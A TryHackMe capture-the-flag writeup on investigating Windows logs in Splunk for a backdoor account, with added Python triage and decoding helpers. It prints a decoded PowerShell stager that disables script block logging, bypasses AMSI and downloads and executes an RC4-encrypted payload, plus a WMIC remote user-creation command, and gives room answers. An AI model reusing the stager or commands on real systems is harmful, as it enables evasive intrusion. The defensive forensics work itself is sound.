Investigating with Splunk tryhackme writeup
Hello! The scenario is that Johny has observed some anomalous behaviour in the logs of a few Windows machines. It looks like the adversary has access to some of these machines and has successfully created some backdoors. His manager has asked him to pull those logs from the suspected hosts and ingest them into Splunk for a quick investigation. Our task as SOC analysts is to examine the logs and identify the anomalies.
Let’s get going, here is the room link.
First we need to select the source of the logs we want to work on: you can use the source field and choose the log source you need, or pick it from the Data Summary in the How to Search section.
- Remember to set the time filter to All Time.
1. How many events were collected and ingested in the index main?
You can see that the number of hits (events) is 12256.
2. On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?
Here I looked up the Windows event ID for creating a user account, which is 4720, and based on that I crafted this query to search for it:
source="splunk_challenge1.json" EventID=4720
Here you can see that the name of the new user is A1berto.
Note: the Subject is typically the entity or element that initiates an action or operation, and here James is the subject :3
3. On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?
A registry value was changed, so I searched for the Sysmon event ID related to that, which is 13 (RegistryEvent, Value Set); you can check this link for more info. Since the question says it is the same host, I put the new username A1berto in the search query, and there was only one hit.
source="splunk_challenge1.json" EventID=13 "A1berto"
The full path of the registry key is: HKLM\SAM\SAM\Domains\Account\Users\Names\A1berto\
4. Examine the logs and identify the user that the adversary was trying to impersonate.
Here it is obvious that the attacker is trying to impersonate Alberto: the backdoor name A1berto only swaps the letter l for the digit 1.
5. What is the command used to add a backdoor user from a remote computer?
I searched for event IDs for remotely executed commands and found a question on one of the communities asking about the same thing, which led to event ID 4688 (process creation).
Notice that the question says backdoor user from a remote computer, which is why I also looked up the command used to create a user in Windows, net user ..., and added that to the search, which helped me reduce the number of events. This is the command:
"C:\windows\System32\Wbem\WMIC.exe" /node:WORKSTATION6 process call create "net user /add A1berto paw0rd1"
This is the query I wrote.
6. How many times was the login attempt from the backdoor user observed during the investigation?
Event ID 4624 is about successful logons; when I searched for that event ID together with the username A1berto there were no hits, so the answer is 0.
7. What is the name of the infected host on which suspicious Powershell commands were executed?
I went back to the query from question five and looked at the Hostname field: it is James.browne.
8. PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?
Here I used event IDs 4104 (script block logging) and 4103 (module logging), and the result was 74 events.
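The pivots used in questions 1 to 8 (find the new account in 4720, pivot on its name into Sysmon 13, hunt `net user` in 4688, check 4624 for logons by the backdoor account, and count 4103/4104) can be replayed offline over exported JSON events. The following Python script is an added example and not part of the writeup or the TryHackMe room; the sample events are constructed, and the field names (EventID, Hostname, SubjectUserName, TargetUserName, TargetObject, CommandLine) are assumptions modeled on Windows Security and Sysmon event data. It also adds a small homoglyph check for the impersonation step in question 4, which the writeup does by eye.

```python
import json
import re

# Constructed sample events standing in for the challenge's JSON log lines (not
# the real data set). Field names are assumptions modeled on Windows Security
# and Sysmon events, not taken from the page.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Hostname": "James.browne", "SubjectUserName": "James",
     "TargetUserName": "A1berto"},
    {"EventID": 13, "Hostname": "James.browne",
     "TargetObject": "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto\\"},
    {"EventID": 13, "Hostname": "James.browne",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"EventID": 4688, "Hostname": "James.browne", "SubjectUserName": "James",
     "CommandLine": '"C:\\windows\\System32\\Wbem\\WMIC.exe" /node:WORKSTATION6 '
                    'process call create "net user /add A1berto paw0rd1"'},
    {"EventID": 4688, "Hostname": "James.browne", "SubjectUserName": "James",
     "CommandLine": "notepad.exe C:\\Users\\James\\notes.txt"},
    {"EventID": 4624, "Hostname": "James.browne", "TargetUserName": "James"},
    {"EventID": 4624, "Hostname": "James.browne", "TargetUserName": "Alberto"},
    {"EventID": 4104, "Hostname": "James.browne",
     "ScriptBlockText": "IF($PSVerSIonTabLe.PSVErSION.MaJOR -Ge 3){ ... }"},
    {"EventID": 4103, "Hostname": "James.browne",
     "Payload": "CommandInvocation(Invoke-Expression)"},
]


def search(events, event_id, *needles):
    """Rough analogue of `EventID=<id> "<needle>"` in Splunk: the event must carry
    the given EventID and every needle must appear somewhere in its JSON text."""
    hits = []
    for ev in events:
        if ev.get("EventID") != event_id:
            continue
        text = json.dumps(ev)
        if all(needle in text for needle in needles):
            hits.append(ev)
    return hits


def backdoor_users(events):
    # 4720 = "A user account was created"; TargetUserName is the new account.
    return sorted({ev["TargetUserName"] for ev in search(events, 4720)})


def registry_paths_for(events, user):
    # Sysmon 13 = RegistryEvent (Value Set); pivot on the new account name.
    return [ev["TargetObject"] for ev in search(events, 13, user)]


def remote_user_add_commands(events):
    # 4688 = process creation. Keep command lines that add a local user and are
    # launched against another machine through WMIC's /node: switch.
    add_user = re.compile(r"net\s+user\b.*/add\b", re.IGNORECASE)
    return [ev["CommandLine"] for ev in search(events, 4688, "net user")
            if add_user.search(ev["CommandLine"]) and "/node:" in ev["CommandLine"].lower()]


def logon_count(events, user):
    # 4624 = successful logon; count only logons where the backdoor account is the target.
    return sum(1 for ev in search(events, 4624) if ev.get("TargetUserName") == user)


def powershell_event_count(events):
    # 4103 = module logging, 4104 = script block logging.
    return len(search(events, 4103)) + len(search(events, 4104))


# Digit-for-letter substitutions commonly used to mimic an existing account name.
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s", "|": "l"})


def impersonation_target(candidate, known_users):
    """Return the known user whose name the candidate mimics after folding homoglyphs."""
    folded = candidate.lower().translate(HOMOGLYPHS)
    for user in known_users:
        if user != candidate and user.lower().translate(HOMOGLYPHS) == folded:
            return user
    return None


def triage(events):
    """Run the whole investigation over a list of events and return the findings."""
    user = backdoor_users(events)[0]
    known = sorted({ev["TargetUserName"] for ev in search(events, 4624)})
    hosts = sorted({ev["Hostname"] for ev in search(events, 4688, "net user")})
    return {
        "backdoor_user": user,
        "registry_paths": registry_paths_for(events, user),
        "impersonates": impersonation_target(user, known),
        "remote_add_commands": remote_user_add_commands(events),
        "host": hosts[0] if hosts else None,
        "backdoor_logons": logon_count(events, user),
        "powershell_events": powershell_event_count(events),
    }


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_EVENTS), indent=2))
```

On the constructed sample the script reports A1berto as the backdoor account, the SAM key under Users\Names as the registry change, Alberto as the impersonated user, the WMIC command line, James.browne as the host, zero logons by the backdoor account and two PowerShell logging events; the counts differ from the room's answers only because the sample is tiny.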
9. An encoded Powershell script from the infected host initiated a web request. What is the full URL?
When I ran the previous query I noticed a weird PowerShell command being executed with a base64 value as one of its parameters, so I took it, decoded it, and this was the result after some cleaning:
IF($PSVerSIonTabLe.PSVErSION.MaJOR -Ge 3){$11BD8=[reF].ASseMbly.GetTyPE('System.Management.Automation.Utils')."GETFIe`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');
IF($11Bd8){$A18E1=$11BD8.GetVaLUE($nUlL);
If($A18e1['ScriptB'+'lockLogging']){$A18e1['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
$a18e1['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[CoLlectiONS.GeNEriC.DIcTiOnARY[StrING,SysTEm.OBJEct]]::neW();
$vAL.AdD('EnableScriptB'+'lockLogging',0);
$VAL.Add('EnableScriptBlockInvocationLogging',0);
$a18e1['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ELsE{[ScRipTBlOCK]."GeTFIE`Ld"('signatures','N'+'onPublic,Static').SEtVAlUe($NuLL,(NEw-OBjeCt CoLLEcTiONS.GeNerIc.HAsHSet[STring]))}$ReF=[Ref].AsSEMBly.GeTTyPe('System.Management.Automation.Amsi'+'Utils');
$Ref.GEtFIeLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALue($NULl,$tRUe);
};
[SYStEm.NeT.ServICePoINtMAnAgER]::EXpeCT100ContINue=0;
$7a6eD=NeW-OBJeCT SYsteM.Net.WEbClIeNT;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$ser=$([TeXT.ENCodiNG]::UnicodE.GetStriNG([CoNVeRT]::FroMBASe64StRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));
$t='/news.php';
$7A6Ed.HEAders.Add('User-Agent',$u);
$7a6Ed.PROxY=[SySTEm.NET.WebREQUesT]::DefAULtWeBPRoXY;
$7a6ED.PROXY.CRedEntIAlS = [SYsTEM.NEt.CRedEnTIaLCachE]::DEFaUltNETwoRKCrEdeNtIALS;
$Script:Proxy = $7a6ed.Proxy;
$K=[SysteM.TeXT.EnCoDIng]::ASCII.GeTByTeS('qm.@)5y?XxuSA-=VD467*|OLWB~rn8^I');
$R={$D,$K=$Args;
$S=0..255;
0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUnt])%256;
$S[$_],$S[$J]=$S[$J],$S[$_]};
$D|%{$I=($I+1)%256;
$H=($H+$S[$I])%256;
$S[$I],$S[$H]=$S[$H],$S[$I];
$_-BxoR$S[($S[$I]+$S[$H])%256]}};
$7A6ed.HeADers.Add("Cookie","KuUzuid=VmeKV5dekg9y7k/tlFFA8b2AaIs=");
$Data=$7a6ed.DowNLoadDatA($SEr+$t);
$iv=$DATA[0..3];
$DaTA=$dATA[4..$DaTA.LEnGtH];
-JOiN[Char[]](& $R $dAta ($IV+$K))|IEX
You can see in this line
$ser=$([TeXT.ENCodiNG]::UnicodE.GetStriNG([CoNVeRT]::FroMBASe64StRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));
that it is decoding another base64 value, which turned out to be the URL, and when you read the rest of the code you will understand that it requests $ser + $t, where $t has the value /news.php.
The full defanged URL would be hxxp[://]10[.]10[.]10[.]5/news[.]php
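The decoding step above can be automated so the host does not have to be decoded by hand: pull every FromBase64String argument out of the script, decode it the way [Text.Encoding]::Unicode does (UTF-16LE), append the $t path and defang the result. This Python helper is an added example, not part of the writeup; the $ser line is the one quoted from the decoded script, the /news.php path is the $t value from it, and the UTF-8 sample used to show the fallback is constructed.

```python
import base64
import re

# The $ser line quoted in the writeup; the decoded script builds the request URL as $ser + $t.
SER_LINE = ("$ser=$([TeXT.ENCodiNG]::UnicodE.GetStriNG([CoNVeRT]::FroMBASe64StRInG("
            "'aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));")
PATH = "/news.php"  # value of $t in the decoded script

# Constructed UTF-8 payload (not from the page) to exercise the encoding fallback.
UTF8_SAMPLE = base64.b64encode(b"Write-Host hi").decode()

# Obfuscated scripts mix upper and lower case freely, so match case-insensitively.
B64_CALL = re.compile(r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.IGNORECASE)


def extract_b64_arguments(script_text):
    """Return every base64 literal passed to [Convert]::FromBase64String in the script."""
    return B64_CALL.findall(script_text)


def decode_powershell_b64(value):
    """Decode a base64 argument as [Text.Encoding]::Unicode (UTF-16LE) does.
    ASCII text in UTF-16LE has a zero high byte in every code unit; anything
    else (odd length, non-zero high bytes) is treated as UTF-8 instead."""
    raw = base64.b64decode(value)
    looks_utf16 = len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])
    if looks_utf16:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def recover_url(script_text, path):
    """Rebuild $ser + $t from the script: the first decoded literal is the host part."""
    hosts = [decode_powershell_b64(v) for v in extract_b64_arguments(script_text)]
    if not hosts:
        raise ValueError("no FromBase64String literal found")
    return hosts[0] + path


def defang(url):
    """Defang a URL for reporting: http -> hxxp, :// -> [://], . -> [.]"""
    url = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
    url = url.replace("://", "[://]")
    return url.replace(".", "[.]")


if __name__ == "__main__":
    url = recover_url(SER_LINE, PATH)
    print(defang(url))  # prints hxxp[://]10[.]10[.]10[.]5/news[.]php
```

The UTF-16LE check matters because PowerShell's Unicode encoding and its -EncodedCommand switch both use UTF-16LE, while many other droppers base64-encode plain UTF-8; decoding with the wrong one yields either interleaved NUL bytes or garbage.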
That’s it, thanks for reading.